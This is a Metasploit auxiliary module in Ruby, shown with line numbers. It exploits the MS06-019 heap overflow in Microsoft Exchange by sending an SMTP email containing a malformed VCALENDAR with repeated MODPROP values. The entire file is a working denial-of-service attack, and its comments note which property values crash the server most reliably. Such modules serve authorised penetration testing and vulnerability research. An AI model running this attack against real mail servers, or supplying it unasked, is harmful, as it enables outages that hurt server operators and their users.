1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Smtp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'MS06-019 Exchange MODPROP Heap Overflow',
15
        'Description' => %q{
16
          This module triggers a heap overflow vulnerability in MS
17
          Exchange that occurs when multiple malformed MODPROP values
18
          occur in a VCAL request.
19
        },
20
        'Author' => [ 'pusscat' ],
21
        'License' => MSF_LICENSE,
22
        'References' => [
23
          [ 'BID', '17908'],
24
          [ 'CVE', '2006-0027'],
25
          [ 'MSB', 'MS06-019'],
26

27
        ],
28
        'DisclosureDate' => '2004-11-12',
29
        'Notes' => {
30
          'Stability' => [CRASH_SERVICE_DOWN],
31
          'SideEffects' => [],
32
          'Reliability' => []
33
        }
34
      )
35
    )
36

37
    register_options(
38
      [
39
        OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains'])
40
      ]
41
    )
42
  end
43

44
  #
45
  # This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class
46
  #
47
  def run
48
    connect_login
49

50
    modprops = [
51
      'attendee', 'categories', 'class', 'created', 'description',
52
      'dtstamp', 'duration', 'last-modified',
53
      'location', 'organizer', 'priority', 'recurrence-id', 'sequence',
54
      'status', 'summary', 'transp', 'uid'
55
    ]
56

57
    # modprops = ['dtstamp']
58

59
    modpropshort =	''
60
    modpropbusted =	''
61
    modnum = rand(3)
62

63
    1.upto(modnum) do
64
      nextprop = rand(modprops.size)
65
      modpropshort << modprops[nextprop] + ','
66
      modpropbusted << modprops[nextprop].upcase + ":\r\n"
67
    end
68

69
    modpropshort = 'dtstamp,'
70
    modpropbusted = "DTSTAMP:\r\n"
71
    modnum = modnum + 1 + rand(3)
72
    modproplong =	modpropshort
73
    1.upto(modnum) do
74
      modproplong << modprops[rand(modprops.size)] + ','
75
    end
76

77
    boundary = Rex::Text.rand_text_alphanumeric(8) + '.' + Rex::Text.rand_text_alphanumeric(8)
78

79
    # Really, the randomization above only crashes /sometimes/ - it's MUCH more
80
    # reliable, and gives crashes in better spots of you use these modprops:
81

82
    modpropshort = 'dtstamp,'
83
    modproplong = 'dtstamp, dtstamp,'
84
    modpropbusted = "DTSTAMP:\r\n"
85

86
    mail =	"From: #{datastore['MAILFROM']}\r\n"
87
    mail <<	"To: #{datastore['MAILTO']}\r\n"
88
    mail <<	"Subject: #{datastore['SUBJECT']}\r\n"
89
    mail <<	"Content-class: urn:content-classes:calendarmessage\r\n"
90
    mail <<	"MIME-Version: 1.0\r\n"
91
    mail <<	"Content-Type: multipart/alternative;boundary=\"#{boundary}\"\r\n"
92
    mail <<	"X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0\r\n"
93
    mail << "\r\n"
94
    mail <<	"--#{boundary}\r\n"
95
    mail <<	"Content-class: urn:content-classes:calendarmessage\r\n"
96
    mail <<	"Content-Type: text/calendar; method=REQUEST; name=\"meeting.ics\"\r\n"
97
    mail <<	"Content-Transfer-Encoding: 8bit\r\n"
98
    mail <<	"\r\n"
99
    mail <<	"BEGIN:VCALENDAR\r\n"
100
    mail <<	"BEGIN:VEVENT\r\n"
101
    mail <<	"X-MICROSOFT-CDO-MODPROPS:#{modpropshort.chop}\r\n"
102
    mail <<	modpropbusted
103
    mail <<	"END:VEVENT\r\n"
104
    mail <<	"BEGIN:VEVENT\r\n"
105
    mail <<	"X-MICROSOFT-CDO-MODPROPS:#{modproplong.chop}\r\n"
106
    mail <<	"END:VEVENT\r\n"
107
    mail <<	"END:VCALENDAR\r\n"
108
    mail <<	"\r\n--#{boundary}\r\n"
109
    mail <<	"\r\n.\r\n"
110

111
    print_status('Sending message...')
112
    sock.put(mail)
113
    sock.put("QUIT\r\n")
114
    print '<< ' + (sock.get_once || '')
115
    disconnect
116
  end
117
end
118

119